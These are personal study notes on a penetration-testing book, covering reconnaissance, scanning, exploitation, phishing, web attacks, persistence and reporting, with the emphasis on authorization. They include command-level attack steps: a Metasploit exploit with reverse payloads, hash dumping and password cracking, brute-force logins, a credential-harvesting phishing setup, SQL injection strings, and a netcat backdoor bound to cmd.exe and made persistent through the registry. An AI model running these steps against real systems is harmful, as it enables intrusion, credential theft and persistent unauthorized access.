J J v1.

1
18/01/2016

The Basics of Hacking and Penetration

Testing
Notes on the excellent book by Patrick Engebretson

https://www.amazon.co.uk/Basics-Hacking-Penetration-Testing-Ethical/dp/0124116442/

NOTES

- There may be additional methods/ techniques required for use against modern systems.
- These are my hacky notes. This document will not be perfect.
- Even if you read this, I would still recommend reading the book itself. It’s excellent!
- This knowledge is largely that of the author. At this point in time, I have had little practice.
This document is my way of having a quick reference. The ‘Red Team Field Manual’ is also
good as a quick reference.

Table of Contents
Steps........................................................................................................................................................ 4
Authorization .......................................................................................................................................... 4
Reconnaissance (Passive and Active) ...................................................................................................... 5
Definitions ........................................................................................................................................... 5
Aim/Purpose of Recon ........................................................................................................................ 5
Google ................................................................................................................................................. 5
Search Engine Directives Search (Johnny Long’s fame) ...................................................................... 6
Research Associates of Merged Companies ....................................................................................... 6
HTTRACK ............................................................................................................................................. 6
Other Online Sources .......................................................................................................................... 7
Social Media ........................................................................................................................................ 7
The Harvester ...................................................................................................................................... 7
Whois.NET and Netcraft ..................................................................................................................... 8
DNS...................................................................................................................................................... 8
NsLookup ............................................................................................................................................ 8
Dig - Attempting Zone Transfer .......................................................................................................... 9
Fierce................................................................................................................................................... 9
Email Server ........................................................................................................................................ 9
Metagoofil........................................................................................................................................... 9
Threat Agent ..................................................................................................................................... 10
Social Engineering ............................................................................................................................. 10
 J J v1.1
18/01/2016

Roundup ............................................................................................................................................ 10
Scanning ................................................................................................................................................ 11
Aim of Scanning ................................................................................................................................ 11
Definitions ......................................................................................................................................... 11
Overview ........................................................................................................................................... 12
Ping (Single)....................................................................................................................................... 13
Ping (Multiples) ................................................................................................................................. 13
Port Scanning .................................................................................................................................... 13
TCP Connect Scans ............................................................................................................................ 14
SYN Scans .......................................................................................................................................... 14
UDP Scans ......................................................................................................................................... 15
XMAS Tree Scans and Null Scans ...................................................................................................... 15
Scripting NMAP ................................................................................................................................. 16
Telnet / SSH....................................................................................................................................... 16
Vulnerability Scanning ...................................................................................................................... 16
Exploitation ........................................................................................................................................... 18
Aim .................................................................................................................................................... 18
Brute Force Accessing Remote Services with Medusa / Hydra ........................................................ 18
Metasploit ......................................................................................................................................... 19
More password cracking – Local – Samdump2 and John (JtR) ......................................................... 21
Password Cracking- Remote ............................................................................................................. 22
Sniffing Network Traffic .................................................................................................................... 22
Armitage – The Hail Mary ................................................................................................................. 23
Social Engineering ................................................................................................................................. 24
Aim .................................................................................................................................................... 24
SET – Social Engineering Toolkit ....................................................................................................... 24
Web Exploitation................................................................................................................................... 25
NikitoWeb Server Vuln Scanning ...................................................................................................... 25
W3AF – Finding standard weaknesses.............................................................................................. 25
Webscarab(Full Spidering) ................................................................................................................ 25
ZAP Spidering, Proxies and Man-In-The-Middle ............................................................................... 26
Injection attacks ................................................................................................................................ 26
XSS – Cross Site Scripting .................................................................................................................. 26
Post Exploitation – Maintaining Access ................................................................................................ 27
Aim .................................................................................................................................................... 27
NetCat and CryptCat ......................................................................................................................... 27
 J J v1.1
18/01/2016

Rootkits ............................................................................................................................................. 27
Defending against rootkits ................................................................................................................ 28
Report ................................................................................................................................................... 29
Executive Summary........................................................................................................................... 29
Walkthrough Report ......................................................................................................................... 29
Detailed Report ................................................................................................................................. 30
After Care .......................................................................................................................................... 30
 J J v1.1
18/01/2016

Steps

1. Authorization
2. Reconnaissance (including research, scanning, vulnerability scanning)
3. Exploitation
4. Post Exploitation (keeping a back door open)
5. Back Hat – Hiding
6. White Hat – Reports (Management Overview and Technical Report)

A full pentest standard can be found at http://www.pentest-standard.org. This is a trimmed down

set of steps.

Authorization

- For white hat hacking, we need permission for the Pen Test.
- Scope must be agreed (on/off limits), especially with regard to maintaining back doors and
rootkits.
- Can be expanded, but must be re-signed off before progressing
- Should have insurance in case you accidentally trash their systems
- Everything must remain confidential.
 J J v1.1
18/01/2016

Reconnaissance (Passive and Active)

Although often overlooked, thorough reconnaissance is the most important step of a good pen test.

Definitions

Passive Reconnaissance – Gather data about the client, but without making direct contact. This is
largely untraceable.

Active Reconnaissance – Gathering data from the client e.g. directly from their website/servers, or
by contacting them.

Aim/Purpose of Recon

The main goals are to acquire IP addresses, email addresses and, if possible, logins.

Remember that email addresses are often closely linked with domain names, so could give us logins.
E.g. [email protected], could have a login of the email address or ben.owned2, ownedb,
ownedb2 etc. There are tools to help us work out domain accounts from emails (see later on)

Remember when researching people that little details can lead to big clues. Someone’s Facebook
post or tweet could give away the starter for a password.

At the end, you should have clear separate lists of:

- IP’s
- Email addresses
- Host names
- Urls
- User Names
- Additional relevant information

Google

Google the company. Gather as much detail about them as possible. E.g.

- What they do
- Where they’re based
- Contact details
- Employee details
- Boss details (esp small companies, the boss probably still has access!)
- Other relevant info
 J J v1.1
18/01/2016

Search Engine Directives Search (Johnny Long’s fame)

Use google directives search to get more information. Some searches are now blocked, so need to
be inventive.

e.g. site:dsu.edu filetype:xlsx

e.g. site:syngress.com intitle:index of (directory of stuff not necessarily in normal search)

Excel files often have interesting information. Other good terms:

- allintitle or intitle: indexof (public folders)

- inurl:admin (probably blocked now, but other words wont be)
- cahe:domain (view cached version of the site, so don’t interact with the client directly)
- filetype:pdf

Research Associates of Merged Companies

As title suggests, research merged companies. These may have access to the IT infrastructure.
Mergers always lead to holes in the infra.

HTTRACK

HTTRACK creates a copy of the clients’ website. You can then do further recon/scanning of their site
offline. THIS IS TRACEABLE

Good details to discover:

- EMAIL ADDRESSES!!!!
- IP Addresses!!!! (possibly in Excel, PPT, Word, or PDF’s)
- Employee names (esp. tech staff)
- Social media accounts (esp. of employees)
- Physical address
- Location
- Phone
- Business hours (so we can hack them out of hours, or contact them during work hours)
- Business relationships (who they do business with)
- Mergers and Acquisitions (more routes in for the future)
- Job Adverts with details of their tech stack/firewalls. Can also get this from job sites
- Robots.txt
 J J v1.1
18/01/2016

Other Online Sources

Forums, news groups, bulletin boards even live chat could reveal info about their software,
hardware, email addresses and configs.

Social Media

People give away tons of details on social media. Investigate employees Facebook, Twitter,
Instagram etc. Might find revealing tweets “Battling with Cisco all day” (Thank you!) or info about
them that could lead to passwords.

LinkedIn will be a big source of information too.

The Harvester

Use ‘The Harvester’ or another email scraper to get company email addresses. It’s built into Kali.
Keep it updated.

Cmd: theharvester
Cmd: updatedb
Locate the harvester folder
Usr/bin/theharvester (if not working by default)

Cmd: ./theharvester.py –d syngress.com –l 10 –b all

-d = domain
-l = number of results to get
-b = search engine. Could be google, bing, yahoo, PGP?, LinkedIn
 J J v1.1
18/01/2016

Whois.NET and Netcraft

Whois should be built into Kali.

Cmd: whois syngress.com

Can also visit the website. Might get the DNS lookup returned, for which you will need the host
command to get the IP. If you get a server name/referral URL, use their whois service to get more
info.

Can use website: http://whois.domaintools.com.

http://news.netcraft.com will give you IP’s, DNS settings and Operating Systems.

If you get host names rather than IPs from whois/netcraft, you can use the host command to get IPs.
The IP can also be used to get the host, but generally, the query will look like:

Cmd: host ndl.dreamhost.com -a

-a = optional switch to get more info.

to get all options, use > man host

DNS

We hope one of these will be the companies DNS Server. DNS Servers are important as they contain
a list of IP’s we can target. Companies DNS systems often weak. Admins know if they mess up the
DNS, bad things happen, so can be wary of touching it, leaving it unpatched and vulnerable.

DNS servers use zone transfer to share/sync their records with other DNS servers. We may be able
to perform a zone transfer, but it is now much harder to do. If we could do a zone transfer, it would
give us all IP mappings for the company. Even if the transfer fails, it’s worth investigating.

NsLookup

Use nslookup to find DNS records with revealing target info

Cmd: nslookup

>server 8.8.8.8

> set type = any

Google the different types. For example, mx = mail server address.

 J J v1.1
18/01/2016

Dig - Attempting Zone Transfer

Dig is good for attempting a zone transfer

Cmd: dig @target_ip

Cmd: dig @192.168.1.23 example.com –t AXFR

-t AXFR = transfer request

(note need to check spacing between IP and domain name)

It is likely this will be blocked, but we may just get a list of host/IP addresses. Do this for all IP
addresses. Not completely sure how we know which is the DNS server, so trying all for the moment.

Fierce

May need to install this via atp -get install fierce. Fierce will attempt a zone transfer. It will then
attempt to brute force host names by sending queries to the server. This uncovers additional targets
e.g. mail.example.com. Assume use “man fierce” for more options, but the basic is:

Cmd: cd usr/bin/fierce
Cmd: ./fierce –dns example.com

Email Server

We can get information about the company’s setup from emails. We could send in a sales request
and then check the headers on the returned mail. Alternatively we could send an email with an
empty.bat file or empty.exe. The email server will hopefully reject it. Good email servers will quietly
swallow this, but less secure ones will return a reject email including info such as headers (from
which we can get the IP), server branding, anti-virus brand.

Metagoofil

Metagoofil searches the internet for meta data about the target e.g.

- User names
- Computer/server names
- Network paths/file shares
- IPs?

It downloads files to your PC.

Cmd: cd /usr/bin/metagoofil
Cmd: mkdirmytargetfiles
Cmd: ./metagoofil.py –d syngress.com –t pdf,doc,xls,pptx –n 20 –o
mytargetfiles –f results.html

./ = current directory
 J J v1.1
18/01/2016

-d = domain switch
-t = file types
-n = number of each file type to report on
-o = save to the this folder
-f = output summary to here.

If all we got back from this was a directory path, it could still tell us a username and OS.

For windows, Search Diggity and FCOA are also useful for this.

Threat Agent

http://www.threatagent.com

Threat agent does a lot of harvesting for you. Sign up for a free account. Enter target organisation or
domain. It emails you info, IP’s, email addresses, contacts, even open ports. Highly recommended by
Patrick Engeretson. Creates an entire dossier for you!

Social Engineering

Social engineering is about exploiting human weaknesses. Will be more on this later. For example, a
conversation with someone from the company could reveal a lot, an email to the sales team could
reveal IP’s.

Could impersonate someone on holiday, or drop carefully labelled USB’s (Annual Reports, Company
Salaries, Employee Reviews!) around in hope someone will put it into their laptop. This would run a
script enabling us access to the system, open a back door and dial home to the attacker.

Need to be very careful. Often only get one chance and once the alarm is sounded, everyone gets
suspicious.

Roundup

At the end of the reconnaissance, you should compile your results into the list of items show in the
Aim/Purpose of Recon section.
 J J v1.1
18/01/2016

Scanning

Aim of Scanning

The purpose of scanning is to:

1. Map IP addresses to open ports and services (potentials for exploit)

2. Potentially create an internal network map to discover critical infra.

At the end of this step, you should have:

1. A list of open ports and services for each IP.

2. Vulnerabilities associated with the IP/Port/Service.

Every port is a potential gateway to our target system. See p56 or google for commonly open
ports/services.

Make special notes of any IP address that includes some type of remote access service (e.g. SSH. FTP,
PCAnywhere, VNC, RDP as these will help ‘own’ a system.

Even if the open system is a perimeter device and not the ‘gold’ target, it may be worth pivoting
from to get there. It might encounter fewer restrictions, or be able to discover other
machines/devices.

Definitions

Perimeter devices – computers, servers, routers, firewalls or other equipment with sits at the outer
edge of a protected network.

IMCP – Internet Control Message Protocol packet

TCP – Transmission control protocol. Connection oriented protocol, meaning it requires packets to
arrive in the order they were sent. Ensures packets are received.

UDP – user datatgram protocol. Connectionless protocol. Packets can arrive in any order, but sender
has no means of knowing/ensuring all packets were received at the other end.

DOS – Denial of service

 J J v1.1
18/01/2016

Overview

1. Determining if a system is alive with PING packets

2. Port scanning with Nmap
3. Using Nmap to get more information
4. Get available vulnerabilities with Nessus (vulnerability scanning).

NOTE: Some companies will turn off PING responses (IMCP packets), so don’t worry too much if
there’s nothing for step 1; Nmap/Nessus might provide something later. If we can ping, they
probably haven’t secured this server very well.
 J J v1.1
18/01/2016

Ping (Single)

Try sending an IMCP echo request packet to test if a computer is on and responding.

Cmd: ping target_ip

NOTE: Windows pings will send 4 packets, Linux pings will continue until you stop them. (Ctrl+C).

If it’s offline or blocking IMCP packets, will see 100% loss or ‘destination host unreachable’.

Ping (Multiples)

FPing will save manually pinging each IP. Use something along the lines of the following to ping a
range. Note: lookup comma separated lists or reading from a list in case company does not have
range (Cmd: “man fping”).

Cmd: fping –a –g 172.16.45.1 172.16.45.254>savedfile.txt

- a = only show live hosts in output

-g = range to sweep
> = output to file

Can view the file in location or by using “cat savedfile.txt”

Port Scanning

The purpose of scanning is to identify open ports and the services running on the target system. E. g
email, FPT, printing, web server. For example, if we find port 80 is open, it is likely it is a web server.

There are 65,536 ports on every computer, either using TCP or UDP.

Nmap is a very good tool for this (www.insecure.org).

Basic process is the Three Way Handshake:

- C1 sends a SYN packet to C2 on a specific port number

- If C2 is listening, it will respond with an SYN/ACK
- C1 receives SYN/ACK and responds with an ACK
- Normal communication ensues.
 J J v1.1
18/01/2016

TCP Connect Scans

Good as gracefully completes handshake (stable, less chance of crash). If you don’t specify a port,
Nmap will scan the 1000 most common.

Cmd: Nmap –sT –p- -Pn 192.168.18.132

-s = type of scan to run

-sT = TCP Connect Scan
- p = scan all ports, not just the top 1000
-Pn = skip host discovery and scan all as if they were alive.

If use -254 on the end, it will scan 192.168.18.1 to 192.168.18.254

Can also import from a text file to save running many scans! (Cmd: man fmap to find out?)

SYN Scans

The default type. Faster than TCP connect, with little chance of DOS’ing the server. Only completes
the first 2 parts of the handshake. Equivalent of a prank call to see if the user answers. Also most
stealthy than TCP connect as the connection is never completed there is a small chance it won’t be
logged.

Cmd: nmap –sS –p- -Pn 192.168.18.132

Don’t actually need the –s switch here.

NOTE: -sV would be a version scan and –T (scale 0-5 fastest) can set the speed of the scan. Faster =
less accurate.
 J J v1.1
18/01/2016

UDP Scans

Many services use UDP including:

- Dynamic host configuration

- DNS (domain name system, for individual lookups)
- Simple network management protocol
- Trivial file transfer protocol

Scanning is slow (10 seconds per IP), so probably ok to search top 1000 ports rather than all of them!

It is also rare for a server to return a message. Most likely the firewall will swallow it, giving us a
response of ‘open|filtered’. For this reason, we also use the version flag in Nmap to try to illicit a
better response.

NMap for UDP

Cmd: nmap –sUV 172.16.45.135

-s = Type of scan to run

U = UDP
V = Version (additional trick to try to illicit info)

XMAS Tree Scans and Null Scans

Both of these violate the TCP communication and can find stuff TCP scans do not, but DO NOT WORK
ON WINDOWS

Can send a TCP RFC (request for comment) to determine the current state of a port. ONLY works on
UNIX and Linux.

Xmas Tree (all flags on – FIN, PSH, URG)

Cmd: nmap –sX –p- -Pn 192.168.18.132

Open port – no response, closed port – RST (reset) package returned?

Null Scan (all flags off)

Cmd: nmap –sN –p- -Pn 192.168.18.132

Open port – no response, closed port – RST (reset) package returned.

df
 J J v1.1
18/01/2016

Scripting NMAP

NSE – Nmap scripting Engine, built into Nmap, provides a lot of additional functionality. Large
community with scripts available. Review docs for each script before running.
http://nmap.org/nsedoc .

Can run a single script or whole category. Huge functionality can even exploit. Check docs, but
examples:

Cmd: nmap –script banner target_ip (prints results of TCP requests)

Cmd:nmap –script vulntarget_ip (vulnerability scanner)

Check out ‘Common Vulnerabilities and Exposures’ (CVE), Open Source Vulnerability Database
(OSVDB) or links provided.

Telnet / SSH

With your list of IP’s/ports, you may be able to log into any remote access services using the default
username and password. Unlikely, but always worth a try.

Cmd: telnet target_ip

Cmd: sshroot@target_ip

Vulnerability Scanning

Nessus is a good tool for this. May need to register for a non-commercial HomeFeed Key from
Nessus.org. Keep plugins updated.

Install (p73)

Cmd: apt-get install Nessus

Cmd: /opt/nessus/sbin/nessus-adduser (add username and password)
Cmd: /opt/nessus/bin/nessus-fetch –register your_reg_key
Cmd: /etc/init.d/nessusd start
// Nessus server now running… go to urlhttps://127.0.0.1:8834 and ignore
the ssl warnings.

NOTE: in the Nessus config, make sure you check “Safe Checks”. Some vuln plugins will actually
exploit the target. We don’t want that yet.

If you have problems, make sure you restart the service (last call above).

Click Scans > New Scan and fill in the form. Make sure you name it well for future reference. If you
have a text file of IP addresses (which you should!), you can load it.
 J J v1.1
18/01/2016

The results will show you known vulnerabilities found by the scan (e.g. p89), which you can use in
the exploitation step. E.g

Critical: MS08-067 Microsoft Windows Server Service Crafted RPC

In nessus, you can click on the vulns found for details.

OpenVas is like Nessus and can also be handy. We will just use Nessus.
 J J v1.1
18/01/2016

Exploitation

Aim

The aim of exploitation is ideally to gain control of a machine with admin privileges. May get some or
all of the way there. For example, you may not get admin access, but may still be able to download
files.

At the end of this step you should have:

- Evidence the system was compromised.

Brute Force Accessing Remote Services with Medusa / Hydra

Using some user names (and system guesses) a password cracker can be used to attempt to log in.
Many systems now include some form of password throttling to limit number of attempts. After x
fails, your IP may be blocked, or the user locked out.

For online password cracking, Medusa and Hydra are well known. For medusa, need IP address, user
name/ user name list, a password or dictionary file containing passwords and the name of the
remote access service (RAS) you are attempting to authenticate with.

Good password dictionaries are streamlined and fee of duplication. Kali has one at
/usr/share/wordlists (taken from a large data breach). Also a small but useful one at
/usr/share/john/password.lst.

If you don’t have a list of usernames, but did manage to get email addresses, medusa can create a
list of potential usernames from this. Checking in the manual, but couldn’t see how.

Once this is done, you can use the list to brute force your way into the remote access service.

Cmd: medusa –h 192.168.18.132 –u ownedb –P /usr/share/john/password.lst –M -ssh

-h = host
-u = username (U = path to username list)
-p = password (P = path to password list)
-M = service to attack
-n = non standard TCP Port number (found in “man medusa” – also some options for parallelisation
which may be default in hydra)

When it finds a working password, the system will stop and tell you. Your pen test may be complete
at this point (depending on the scope).
 J J v1.1
18/01/2016

Metasploit

This is a beast, with whole books on how to use it. It can add users, open backdoors, install software
onto a target machine.

Start Metasploit and get it ready to use with:

Cmd: msfconsole
Cmd: msfupdate

To use Metasploit properly, need to match a known vulnerability with an exploit. High or critical
often allow root access / remote code execution.

1. Take the vuln code from nessus/nmap and use the search function for a matching exploit

Cmd :searchMS08-067

You can also search dates e.g. search 2015.

Metasploit returns the name, location and a rank based on success/usefulness 1 = rubbish,
7= ace. See p90 for search.

2. Start a series of commands to run the exploit

Cmd: use exploit/windows/smb/ms08_067_netapi

3. View Payloads (review docs for info)

Cmd: show payloads

4. Select a payload (review docs for info – in this case, it will install VNC remote control and
have it connect back to us). Remember VNC needs a GUI based OS. See next page for
meterpreter payloads.

Cmd: set payload windows/vncinject/reverse_tcp

5. Show options again and set the rest. Make sure they are all set!!! In this case we have 2
options that need filling

Cmd: show options

Cmd: set RHOST 192.168.18.131 (this is the remote server – target)

Cmd: set LHOST 192.168.18.130 (this is your IP)

6. Do a show options again to make sure you’re not missing anything.

7. Exploit it!
Cmd: exploit
 J J v1.1
18/01/2016

More realistic payloads for Metasploit p95. Bind payloads send an exploit and make a connection to
the target machine. Reverse payloads send the exploit, then have the remote machine connect back.

Good Metasploit payloads that install meterpreter on the target:

Windows/meterpreter/bind_tcp
Windows/meterpreter/reverse_tcp

Meterpreter is a powerful shell. It runs in memory so stealthy. Will try to gain admin access, but will
be restricted if the service exploited does not have privileges.

Meterpreter commands

‘migrate’ - migrate the meterpreter to another process e.g. vschost.exe to escape it being shut down
by a reboot.

‘cat’ – list the file contents on the screen

‘download’ – pull a file from the target

‘hashdump’ – get password hashes from the computer. Hashdump is important for getting better
privileges on that machine. This means if your first login had little privileges, all is not lost – you
might still get admin access yet. Once you have that admin password, it could well be the same for
other accounts!

Upload, edit, kill to stop a process (e.g. antivirus), + standard terms e.g. cd, mkdir. Can interact with
a ruby shell.
 J J v1.1
18/01/2016

More password cracking – Local – Samdump2 and John (JtR)

General process for cracking local passwords:

1. Shut down target

2. Boot alternate OS via CD or USB
3. Mount the local hard drive
4. Use Samdump2 to extract the hashes
5. Use JtR, RainbowCrack or something similar to crack the passwords

In windows, C:\Windows\System32\Config, there is a SAM file. This contains all the usernames and
password hashes. This is encrypted. It is also locked on boot of the system.

Need to boot Kali or a similar OS from CD or Pen Drive. Might need UNetBootin
(https://unetbootin.github.io/). You may also need to change the boot order first.

Once you’re up and running. Mount the drive. You may need to run command ‘fdisk -l’ to work out
which to mount. May need to create the mount point with command ‘mkdirmnt/sdal’.

Cmd: mount /dev/sdal /mount/sdal

Once it’s mounted, navigate to the correct drive.

Cmd: cd /mnt/sdal/Windows/system32/config

Then use Samdump2 to extract the hashes and make sure you have a local copy…

Cmd: samdump2 system SAM > /tmp/hashes.txt

Cmd: cat /tmp/hashes.txt

Then need to email the hashex.txt file or find another way of getting it to yourself as the USB will not
be persistent!

Can then set about cracking the passwords, either with a good dictionary, or a brute force cracker
(aaa, aab, aac…).

John (JtR) is a good tool for password cracking.

Cmd: /tmp/hashes.txt –format=nt

Don’t necessarily need the format, but good practice to ensure the settings are right.

OS X/ Linux Notes: passwords held in a ‘shadow’ file located at /etc/shadow. Only privileged users
can access it, but /etc/passwd may have a list of old passwords which we can get to and then make
educated guesses about the new password.

Instead of samdump, use

Cmd: unshadow /etc/passwd /etc/shadow >tmp/hashes.txt

 J J v1.1
18/01/2016

Password Cracking- Remote

Usually done once you have gained access to a machine. Get the hashes by using command
‘hashdump’ from a meterpreter shell. These can usually be copied and pasted from the terminal.

One of the key features to doing this is that we can get privilege escalation. If your lowly user is
lacking rights, the hashdump may give you details of other users with more rights.

Password Cracking – Password Resetting

Effective, but the user will definitely know you’ve been there. There’s no way to restore a SAM file.
Mount Kali as before, but instead of samdump, run

Cmd: chntpw –I /mnt/sdal/WINDOWS/system32/config/SAM

-i = run interactively so you can choose the user you’d like to reset.
Might need to run ‘fdisk –l’ to check correct disk drive.

Follow the chntpw instructions. With a blank password, you’ll gain easy access. Will need to issue
‘reboot’ command first.

Sniffing Network Traffic

Use Wireshark, Dsniff and macof p113. Ettercap may also be handy.

Macof can be used to flood switches with fake DNS entries to force fail open switches to broadcast
all information to all computers on the network. If switches are fail closed, with will effectively DOS
them.

It causes a lot of noise and is easily detectable.

e.g.

Cmd: macof –I eth0 –s 192.168.18.130 –d 192.168.18.2

-i = computer your usings network card.

-s = source address
-d = destination of attack

Wireshark is sweet for viewing network traffic. Can restrict down to network cards and types p114.
 J J v1.1
18/01/2016

Armitage – The Hail Mary

P117. Easy by not remotely stealthy.

Armitage will bombard the target with every known exploit it has, even when it’s gotten in! Get an
easy to use GUI.

Armitage uses metasploit, so metaspoit must be running (‘msfconsole’?).

Cmd: armitage

Use the GUI to do Hosts > Quick Scan (OS Detect)

Use the GUI to do Attacks > Hail Mary.

Screens with lightning bolts will appear. Click on them to get a shell. Can now upload programs to
the target and/or interact with it.
 J J v1.1
18/01/2016

Social Engineering

Aim

Trick users handing over their credentials.

SET – Social Engineering Toolkit

Has tons of features for tricking users.

Cmd: se-toolkit

The follow the options

1. Spear phishing – emails with malicious attachments. Hard to do these days.

2. Website Attack Vectors. Successful group of attacks. Use Java Applet attacks or credential
harvesters. Clones a webpage (e.g. corporate site) then records what people enter when
they go to your spoof site, rather than the original.
- Set up SET
- Register domain (and even SSL!) Make sure the domain is believeable.e.g. survey-
mycompany.com for mycompany.com.
- Email a few targeted people with a specific pretext and link to spoof site. Employee
satisfaction surveys with a prize or something like that might work.
- Get Shells

3. Review other options, such as SMS spoofing in this chapter.

 J J v1.1
18/01/2016

Web Exploitation

NikitoWeb Server Vuln Scanning

Nikto is a web vul scanner.

Cmd: nikto –h 192.168.18.132 –p 1-1000, 8080

-h = target IP
-p = ports (if missing, just scans 80).
-o = filepath to save results.

W3AF – Finding standard weaknesses

Easily identifies most web based vulns e.g. SQL Injection, XSS, file includes, CORS. Has a handy GUI

Cmd: w3af

Can use this against the OWASP TOP 10

When scanning ensure check boxes from error and info are not on. We just want vulnerabilities.

If it finds something good, you may be able to exploit this from the exploits tab

Webscarab(Full Spidering)

Cmd: webscarab
In the GUI go to Tools > Use full featured interface. Restart the tool.

Set up a proxy in iceweasel (or any other browser)

- Edit > Preferences

- Advanced > Network > Settings
- ‘Manual Http proxy configuration’
- HTTP Proxy > 127.0.0.1
- Port 8008
- Check ‘use this proxy for all protocols’
- Start browsing as usual – will get SSL warnings.

Certificates are the best way to defend man in the middle attacks like this.

Now in the webscarab GUI, you will have options such as ‘spider tree’ (right click), which you can use
to look for info not readily available, hopefully confidential. May be able to change the requests
using the ‘intercept requests’ and ‘intercept responses’ check boxes.
 J J v1.1
18/01/2016

ZAP Spidering, Proxies and Man-In-The-Middle

***(p160) Better for intercepting attacks is ZAP (Zed Attack Proxy). Configure the proxy as above,
but on port 8080.

Cmd: zap

This will really nicely intercept web traffic and allow you to edit the content sent (most importantly)
and received. Can choose the direction of the traffic you want to stop and tamper with. Some good
tests:

- Order -5 (negative 5) TVs

- Try altering prices
- Removing variables completely (e.g a username and password variable – not just the
values, the variables themselves!)
- What if you try a cookie that’s different from the current logged in user.
- …

Can right click on a request and do “spider site” for a larger attack surface (e.g. hidden, less well
validated, content)

Can also do vulnerability scans, where it will show you the weak pages for you to attack. This can be
passive (it just looks at the responses you get), or active, where it sends lots of malicious requests to
work out vulns for you to attack. Rapid requests are likely to raise alarm bells at the website’s end.
Results are in the ‘Alerts’ tab.

Injection attacks

Not much new here, though can be quite effective against PHP services. May be able to hack using
examples

‘searchterm’ or 1 =1 –

‘or’ 1 = 1 –

For searches and logins. If you can get this to work on a username, you might even end up with the
admin account!

XSS – Cross Site Scripting

Hard to do now. Basically try some javascript in input boxes. E.g. “<script>alert(‘ok’)</script>”.

Reflected XSS is returned to the user immediately. Stored XSS goes into the DB for execution at a
later point.
 J J v1.1
18/01/2016

Post Exploitation – Maintaining Access

Aim
The aim is to be able to get back into an exploited machine even after reboots and shutdowns.

NetCat and CryptCat

P168 onwards.

Have access to Windows Target with meterpreter shell.

1. Upload netcat (the windows version in this case)

meterpreter> upload nc.exe C:\\Windows\\system32

2. Once netcat has been uploaded, pick a port number, bind the cmd.exe and start netcat in
server (listener) mode.

meterpreter>nc –L –p 5777 –e cmd.exe

3. Add netcat to the registry to run on startup need to look this up, but could be like.

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "My

App" /t REG_SZ /F /D "C:\MyAppPath\MyApp.exe"

4. Connect a netcat client

nctarget_ip 5777

5. You can now do as you please.

Review the docs for more info on this powerful tool.

Rootkits

P174. Like HackerDefender. Works at a lower level than the OS, so can hide netcat and other
programs completely. Be careful if using these as they can be very dodgy! Amazingly powerful
though. Can use to keep back doors open, escalate privileges etc.

Never use a rootkit without specific permission from the client and client and specific permission.
Most clients will not allow rootkits and you might well be sacked for using one.
 J J v1.1
18/01/2016

Defending against rootkits

To help defend against rootkits:

- Deprivilege your users.

- Closely monitor info you put on the internet.
- Properly configure firewalls and other access controls
- Patch systems
- Install and use antivirus
- Make use of an intrusion detection system
- Monitor outbound traffic as well as inbound traffic.
 J J v1.1
18/01/2016

Report

The most interesting bit as far as the client is concerned. Make it good for more work!

Remember to send it encrypted with something likeTrueCrypt. They may need help with this. If
they’re dinosaurs and want a paper copy, make sure it’s signed for. An info leak at this point could
be terrible for the company and your reputation.

Obviously, if a company asks for a sample report, never provide a redacted copy. Send them
something completely made up (but based on a true scenario)!

Executive Summary

2 pages max. Aimed at managers with no IT skills. General overview and highlight of any major
concerns.

Should reference sections of the detailed report for those needing a more in depth look.

Walkthrough Report

May want to provide a walkthrough report so the client can see the steps you took to compromise
the system. This could be part of the detailed report.
 J J v1.1
18/01/2016

Detailed Report

Target – IT managers, IT Pros

Rank the vulns and start with most critical.

It’s ok to point out you couldn’t access a system if you can demonstrate there is potential and the
system is important.

Screenshots are good.

Mitigations, Solutions and suggestions for fixing usually googleable and are essential for the report.

It’s up to you/ the client whether you provide raw data. May want to sanitize it. Don’t use raw data
in the report. You can reference an appendix or separate report for raw data.

Make sure the raw data doesn’t have any silly ‘dev/hack test’ names/properties.

After Care

Remember the client will have questions, so this needs to be in the budget to help them. They might
not be tech savvy. Need to find the line, but after care will effect whether they recommend you or
not. Maybe have a set amount of time agreed in the contract to start?